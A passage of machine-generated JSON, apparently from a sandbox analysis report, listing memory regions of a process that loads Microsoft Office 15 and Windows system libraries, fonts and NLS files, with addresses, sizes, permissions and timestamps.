"permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36048895, "entry_point": 35979264, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_198", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36241408, "type": "region", "version": 1 }, "end_va": 37289983, "entry_point": 0, "filename": null, "id": "region_199", "name": "private_0x0000000002290000", "norm_filename": null, "region_type": "private_memory", "start_va": 36241408, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37548031, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x00000000023b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37421056, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 37552128, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x00000000023d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37552128, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { 
"filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38600704, "type": "region", "version": 1 }, "end_va": 38604799, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x00000000024d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38600704, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 38666240, "type": "region", "version": 1 }, "end_va": 38674431, "entry_point": 0, "filename": null, "id": "region_203", "name": "pagefile_0x00000000024e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38666240, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 0, "filename": null, "id": "region_204", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40300543, "entry_point": 39780352, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_205", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", 
"start_va": 39780352, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 40501248, "type": "region", "version": 1 }, "end_va": 40763391, "entry_point": 0, "filename": null, "id": "region_206", "name": "private_0x00000000026a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40501248, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 44957695, "entry_point": 0, "filename": null, "id": "region_207", "name": "pagefile_0x00000000026e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40763392, "timestamp": "00:00:14.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 44957696, "type": "region", "version": 1 }, "end_va": 54591487, "entry_point": 44957696, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_208", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 44957696, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 54591488, "type": "region", "version": 1 }, "end_va": 55640063, "entry_point": 0, "filename": null, 
"id": "region_209", "name": "private_0x0000000003410000", "norm_filename": null, "region_type": "private_memory", "start_va": 54591488, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 55771136, "type": "region", "version": 1 }, "end_va": 56033279, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000003530000", "norm_filename": null, "region_type": "private_memory", "start_va": 55771136, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 56426496, "type": "region", "version": 1 }, "end_va": 56492031, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000035d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56426496, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 56492032, "type": "region", "version": 1 }, "end_va": 57540607, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000035e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56492032, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 57933824, "type": 
"region", "version": 1 }, "end_va": 57999359, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x0000000003740000", "norm_filename": null, "region_type": "private_memory", "start_va": 57933824, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 58261504, "type": "region", "version": 1 }, "end_va": 58327039, "entry_point": 0, "filename": null, "id": "region_214", "name": "private_0x0000000003790000", "norm_filename": null, "region_type": "private_memory", "start_va": 58261504, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 58327040, "type": "region", "version": 1 }, "end_va": 58736639, "entry_point": 58327040, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_215", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 58327040, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59047936, "type": "region", "version": 1 }, "end_va": 60096511, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000003850000", "norm_filename": null, "region_type": "private_memory", "start_va": 59047936, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": 
[ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 60358656, "type": "region", "version": 1 }, "end_va": 60424191, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000003990000", "norm_filename": null, "region_type": "private_memory", "start_va": 60358656, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 60424192, "type": "region", "version": 1 }, "end_va": 68812799, "entry_point": 0, "filename": null, "id": "region_218", "name": "pagefile_0x00000000039a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 60424192, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 68878336, "type": "region", "version": 1 }, "end_va": 69926911, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x00000000041b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 68878336, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 69926912, "type": "region", "version": 1 }, "end_va": 70713343, "entry_point": 69926912, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_220", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 69926912, "timestamp": "00:00:14.820", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71106560, "type": "region", "version": 1 }, "end_va": 72155135, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000043d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71106560, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 72613888, "type": "region", "version": 1 }, "end_va": 73662463, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x0000000004540000", "norm_filename": null, "region_type": "private_memory", "start_va": 72613888, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 73990144, "type": "region", "version": 1 }, "end_va": 75038719, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000004690000", "norm_filename": null, "region_type": "private_memory", "start_va": 73990144, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 79233023, "entry_point": 0, "filename": null, "id": "region_224", "name": "pagefile_0x0000000004790000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 75038720, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 80478208, "type": "region", "version": 1 }, "end_va": 80740351, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000004cc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 80478208, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 82247680, "type": "region", "version": 1 }, "end_va": 82509823, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x0000000004e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 82247680, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 84541440, "type": "region", "version": 1 }, "end_va": 84803583, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000050a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84541440, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 84803584, "type": "region", "version": 1 }, "end_va": 88997887, "entry_point": 0, "filename": null, "id": "region_228", 
"name": "private_0x00000000050e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 84803584, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 88997888, "type": "region", "version": 1 }, "end_va": 91095039, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x00000000054e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 88997888, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 91095040, "type": "region", "version": 1 }, "end_va": 95289343, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000056e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 91095040, "timestamp": "00:00:14.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 95289344, "type": "region", "version": 1 }, "end_va": 103677951, "entry_point": 0, "filename": null, "id": "region_231", "name": "pagefile_0x0000000005ae0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 95289344, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 103677952, "type": "region", "version": 1 }, 
"end_va": 107876351, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x00000000062e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 103677952, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 107937792, "type": "region", "version": 1 }, "end_va": 112136191, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000066f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 107937792, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 112197632, "type": "region", "version": 1 }, "end_va": 116396031, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x0000000006b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 112197632, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 116457472, "type": "region", "version": 1 }, "end_va": 118554623, "entry_point": 0, "filename": null, "id": "region_235", "name": "private_0x0000000006f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 116457472, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": 
null, "size": 4980736, "start_va": 118554624, "type": "region", "version": 1 }, "end_va": 123535359, "entry_point": 0, "filename": null, "id": "region_236", "name": "private_0x0000000007110000", "norm_filename": null, "region_type": "private_memory", "start_va": 118554624, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 123535360, "type": "region", "version": 1 }, "end_va": 127729663, "entry_point": 0, "filename": null, "id": "region_237", "name": "private_0x00000000075d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 123535360, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 127729664, "type": "region", "version": 1 }, "end_va": 136118271, "entry_point": 0, "filename": null, "id": "region_238", "name": "private_0x00000000079d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 127729664, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 912392192, "type": "region", "version": 1 }, "end_va": 912457727, "entry_point": 0, "filename": null, "id": "region_239", "name": "private_0x0000000036620000", "norm_filename": null, "region_type": "private_memory", "start_va": 912392192, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because 
region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1630208, "start_va": 1671495680, "type": "region", "version": 1 }, "end_va": 1673125887, "entry_point": 1671495680, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL", "id": "region_240", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 1671495680, "timestamp": "00:00:14.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 741376, "start_va": 1673134080, "type": "region", "version": 1 }, "end_va": 1673875455, "entry_point": 1673134080, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL", "id": "region_241", "name": "adal.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll", "region_type": "memory_mapped_file", "start_va": 1673134080, "timestamp": "00:00:14.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1673920512, "type": "region", "version": 1 }, "end_va": 1674420223, "entry_point": 1673920512, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_242", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1673920512, "timestamp": "00:00:14.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region 
is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1089536, "start_va": 1675296768, "type": "region", "version": 1 }, "end_va": 1676386303, "entry_point": 1675296768, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_243", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 1675296768, "timestamp": "00:00:14.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 1676410880, "type": "region", "version": 1 }, "end_va": 1677639679, "entry_point": 1676410880, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_244", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 1676410880, "timestamp": "00:00:14.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 80654336, "start_va": 1677656064, "type": "region", "version": 1 }, "end_va": 1758310399, "entry_point": 1677656064, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL", "id": "region_245", "name": "msores.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll", "region_type": "memory_mapped_file", "start_va": 1677656064, "timestamp": "00:00:14.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 26099712, "start_va": 
1758330880, "type": "region", "version": 1 }, "end_va": 1784430591, "entry_point": 1758330880, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL", "id": "region_246", "name": "mso.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll", "region_type": "memory_mapped_file", "start_va": 1758330880, "timestamp": "00:00:14.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 21741568, "start_va": 1784479744, "type": "region", "version": 1 }, "end_va": 1806221311, "entry_point": 1784479744, "filename": "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL", "id": "region_247", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 1784479744, "timestamp": "00:00:14.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1806630912, "type": "region", "version": 1 }, "end_va": 1807167487, "entry_point": 1806630912, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_248", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 1806630912, "timestamp": "00:00:14.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1138688, "start_va": 1807220736, "type": "region", "version": 1 }, "end_va": 1808359423, "entry_point": 1807220736, "filename": 
"\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL", "id": "region_249", "name": "msptls.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 1807220736, "timestamp": "00:00:14.935", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3608576, "start_va": 1808400384, "type": "region", "version": 1 }, "end_va": 1812008959, "entry_point": 1808400384, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL", "id": "region_250", "name": "msointl.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 1808400384, "timestamp": "00:00:14.938", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 786432, "start_va": 1812070400, "type": "region", "version": 1 }, "end_va": 1812856831, "entry_point": 1812070400, "filename": "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL", "id": "region_251", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 1812070400, "timestamp": "00:00:14.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 761856, "start_va": 1812856832, "type": "region", "version": 1 }, "end_va": 1813618687, "entry_point": 1812856832, 
"filename": "\\Windows\\System32\\d2d1.dll", "id": "region_252", "name": "d2d1.dll", "norm_filename": "c:\\windows\\system32\\d2d1.dll", "region_type": "memory_mapped_file", "start_va": 1812856832, "timestamp": "00:00:14.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14319616, "start_va": 1813643264, "type": "region", "version": 1 }, "end_va": 1827962879, "entry_point": 1813643264, "filename": "\\Program Files\\Microsoft Office\\Office15\\OART.DLL", "id": "region_253", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\oart.dll", "region_type": "memory_mapped_file", "start_va": 1813643264, "timestamp": "00:00:14.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1855455232, "type": "region", "version": 1 }, "end_va": 1855758335, "entry_point": 1855455232, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_254", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 1855455232, "timestamp": "00:00:14.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 1861025792, "type": "region", "version": 1 }, "end_va": 1861357567, "entry_point": 1861025792, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_255", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": 
"memory_mapped_file", "start_va": 1861025792, "timestamp": "00:00:14.953", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 1864499200, "type": "region", "version": 1 }, "end_va": 1864683519, "entry_point": 1864499200, "filename": "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_256", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1864499200, "timestamp": "00:00:14.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 1865351168, "type": "region", "version": 1 }, "end_va": 1865437183, "entry_point": 1865351168, "filename": "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL", "id": "region_257", "name": "msohev.dll", "norm_filename": "c:\\program files\\microsoft office\\office15\\msohev.dll", "region_type": "memory_mapped_file", "start_va": 1865351168, "timestamp": "00:00:14.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1409024, "start_va": 1875050496, "type": "region", "version": 1 }, "end_va": 1876459519, "entry_point": 1875050496, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_258", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 1875050496, 
"timestamp": "00:00:14.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5242880, "start_va": 1887240192, "type": "region", "version": 1 }, "end_va": 1892483071, "entry_point": 1887240192, "filename": "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF", "id": "region_259", "name": "office.odf", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf", "region_type": "memory_mapped_file", "start_va": 1887240192, "timestamp": "00:00:15.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1892483072, "type": "region", "version": 1 }, "end_va": 1894842367, "entry_point": 1892483072, "filename": "\\Windows\\System32\\msi.dll", "id": "region_260", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1892483072, "timestamp": "00:00:15.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 